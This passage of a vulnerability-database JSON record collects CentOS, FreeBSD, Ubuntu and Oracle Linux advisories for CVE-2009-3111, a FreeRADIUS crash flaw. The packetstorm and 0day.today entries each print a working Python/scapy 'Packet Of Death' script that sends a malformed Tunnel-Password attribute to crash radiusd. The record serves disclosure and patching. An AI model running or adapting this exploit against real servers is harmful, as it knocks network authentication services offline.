Advisory** CESA-2009:1451\n\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/016229.html\n\n**Affected packages:**\nfreeradius\nfreeradius-mysql\nfreeradius-postgresql\nfreeradius-unixODBC\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html", "edition": 1, "reporter": "CentOS Project", "published": "2009-10-30T15:43:49", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "freeradius security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "modified": "2009-10-30T15:43:49", "href": "http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html", "id": "CESA-2009:1451", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2016-09-26T17:24:50", "references": ["http://www.milw0rm.com/exploits/9642", "http://freeradius.org/security.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.1.8", "packageFilename": "UNKNOWN", "packageName": "freeradius", "arch": "noarch", "operator": "lt"}], "edition": 1, "description": "\nfreeRADIUS Vulnerability Notifications reports:\n\n2009.09.09 v1.1.7 - Anyone who can send packets to\n\t the server can crash it by sending a Tunnel-Password\n\t attribute in an Access-Request packet. This\n\t vulnerability is not otherwise exploitable. We have\n\t released 1.1.8 to correct this vulnerability.\nThis issue is similar to the previous Tunnel-Password\n\t issue noted below. The vulnerable versions are 1.1.3\n\t through 1.1.7. Version 2.x is not affected.\n\n", "reporter": "FreeBSD", "published": "2009-09-09T00:00:00", "title": "freeradius -- remote packet of death vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "modified": "2009-12-14T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html", "id": "1B3F854B-E4BD-11DE-B276-000D8787E1BE", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-03-29T18:17:03", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3111"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1.1.7-1ubuntu0.2", "arch": "noarch", "packageName": "freeradius", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "It was discovered that FreeRADIUS did not correctly handle certain malformed attributes. A remote attacker could exploit this flaw and cause the FreeRADIUS server to crash, resulting in a denial of service.", "edition": 1, "reporter": "Ubuntu", "published": "2009-09-16T00:00:00", "title": "FreeRADIUS vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-16T00:00:00", "href": "https://usn.ubuntu.com/832-1/", "id": "USN-832-1", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:57", "references": [], "edition": 1, "description": "", "reporter": "Matthew Gillespie", "published": "2009-09-11T00:00:00", "type": "packetstorm", "title": "FreeRadius Packet Of Death", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "href": "https://packetstormsecurity.com/files/81198/FreeRadius-Packet-Of-Death.html", "id": "PACKETSTORM:81198", "sourceData": "`#!/usr/bin/env python \n# FreeRadius Packet Of Death \n# Matthew Gillespie 2009-09-11 \n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py \n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ \n \nimport sys \nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr \n \nif len(sys.argv) != 2: \nprint \"Usage: radius_killer.py <radiushost>\\n\" \nsys.exit(1) \n \nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\ \nRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\ \nRadiusAttr(type=69,value=\"\",len=2) \n \nsend(PoD) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/81198/freeradius-dos.txt"}], "oraclelinux": [{"lastseen": "2016-09-04T11:16:44", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "ia64", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.ia64.rpm", "packageName": "freeradius-postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "i386", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius-unixODBC", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "ia64", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.ia64.rpm", "packageName": "freeradius-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "ia64", "packageFilename": "freeradius-1.1.3-1.5.el5_4.ia64.rpm", "packageName": "freeradius", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "i386", "packageFilename": "freeradius-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "i386", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius-postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "ia64", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.ia64.rpm", "packageName": "freeradius-unixODBC", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "x86_64", "packageFilename": "freeradius-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "i386", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "x86_64", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius-unixODBC", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "x86_64", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "src", "packageFilename": "freeradius-1.1.3-1.5.el5_4.src.rpm", "packageName": "freeradius", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "src", "packageFilename": "freeradius-1.1.3-1.5.el5_4.src.rpm", "packageName": "freeradius", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "src", "packageFilename": "freeradius-1.1.3-1.5.el5_4.src.rpm", "packageName": "freeradius", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "arch": "x86_64", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius-postgresql", "operator": "lt"}], "description": "[1.1.3-1.5]\n- Security: Fix Tunnel-Password zero-length attributes flaw (bug #521912)\n Resolves: RH BZ#522062\n- rebase a couple of old patches (freeradius-0.9.0-com_err.patch,\n freeradius-1.0.0-samba3.patch) so they apply with fuzz=0 ", "edition": 1, "reporter": "Oracle", "published": "2009-09-17T00:00:00", "title": "freeradius security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-17T00:00:00", "id": "ELSA-2009-1451", "href": "http://linux.oracle.com/errata/ELSA-2009-1451.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-02-16T05:08:01", "references": [], "edition": 2, "description": "Exploit for multiple platform in category dos / poc", "reporter": "Matthew Gillespie", "published": "2009-09-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "FreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-09-11T00:00:00", "id": "1337DAY-ID-7004", "href": "https://0day.today/exploit/description/7004", "sourceData": "=================================================================\r\nFreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)\r\n=================================================================\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint \"Usage: radius_killer.py <radiushost>\\n\"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\\r\n\tRadiusAttr(type=69,value=\"\",len=2)\r\n\r\nsend(PoD)\r\n\r\n\r\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7004"}]}}